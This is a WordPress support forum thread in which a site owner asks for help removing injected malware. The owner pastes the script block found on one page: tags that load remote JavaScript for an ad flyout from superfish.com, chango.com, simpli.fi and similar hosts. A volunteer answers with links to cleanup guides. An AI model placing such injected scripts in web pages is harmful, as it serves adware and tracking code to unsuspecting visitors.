Title: Malware
Last modified: August 22, 2016

---

# Malware

 *  Resolved [stwallace](https://wordpress.org/support/users/stwallace/)
 * (@stwallace)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/malware-40/)
 * Hello, I seem to be having trouble removing a malware script. I’ve tried using
   malware/security plugins to locate it. I’ve to go through the pages manually 
   but I’m unable to find it. The script only appears on one page,[http://viperssoftball.com/team/about-vvsc/sponsor-lists/](http://viperssoftball.com/team/about-vvsc/sponsor-lists/).
   It is a right flyout for various ads. I’ve trying the pages in the admin folder,
   themes, js, includes. I think I’ve gone through the entire site. Does anyone 
   have any recommendation for a malware plugin. Here is the script. Any advise 
   will be greatly appreciated.
 * <div id=”__tbSetup”></div>
    <p><script src=”[https://secure-content-delivery.com/data.js.php?i=](https://secure-content-delivery.com/data.js.php?i=){
   2AFCF1C2-016A-4BC8-BA32-5BA0261ED354}&d=2013-4-6&s=http://viperssoftball.com/
   vipers_games/wp-admin/post.php?post=774&action=edit”></script><script id=”__changoScript”
   >// <![CDATA[ var __chd__ = {‘aid’:11079,’chaid’:’www_objectify_ca’};(function(){
   var c = document.createElement(‘script’); c.type = ‘text/javascript’; c.async
   = true;c.src = ( ‘https:’ == document.location.protocol ? ‘[https://z&#8217](https://z&#8217);:‘
   [http://p&#8217](http://p&#8217);) + ‘.chango.com/static/c.js’; var s = document.
   getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(c, s);})(); // ]]
   ></script><script id=”__simpliScript” src=”[http://i.simpli.fi/dpx.js?cid=3065&m=1&#8243](http://i.simpli.fi/dpx.js?cid=3065&m=1&#8243);
   data-sifi-parsed=”true”></script><script src=”[http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&userId=ezJBRkNGMUMyLTAxNkEtNE&CTID=default-US”></script><script](http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&userId=ezJBRkNGMUMyLTAxNkEtNE&CTID=default-US”></script><script)
   src=”[http://i.simpli.fi/p?cid=3065&cb=dpx_3201129895064249._hp”></script></p&gt](http://i.simpli.fi/p?cid=3065&cb=dpx_3201129895064249._hp”></script></p&gt);
   </p> <!– /article-content –>

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [Andrew Nevins](https://wordpress.org/support/users/anevins/)
 * (@anevins)
 * WCLDN 2018 Contributor | Volunteer support
 * [11 years, 2 months ago](https://wordpress.org/support/topic/malware-40/#post-5951071)
 * You need to start working your way through these resources:
    - [https://codex.wordpress.org/FAQ_My_site_was_hacked](https://codex.wordpress.org/FAQ_My_site_was_hacked)
    - [https://wordpress.org/support/topic/268083#post-1065779](https://wordpress.org/support/topic/268083#post-1065779)
    - [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
    - [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Additional Resources:
    - [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
    - [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/)
    - [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 *  Thread Starter [stwallace](https://wordpress.org/support/users/stwallace/)
 * (@stwallace)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/malware-40/#post-5951075)
 * Thank you. The response was perfect. I never thought to check the post itself.
   It was right there in plain site. Since this site is a fresh install hopefully,
   I’ve closed at least one more back door. All the plugins and the theme were fresh
   installs as well. There were at least two outdated plugins that I was using. 
   I made sure not to install those again.
 * Thanks for the quick response and the resources. They have been bookmarked.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Malware’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 2 replies
 * 2 participants
 * Last reply from: [stwallace](https://wordpress.org/support/users/stwallace/)
 * Last activity: [11 years, 2 months ago](https://wordpress.org/support/topic/malware-40/#post-5951075)
 * Status: resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics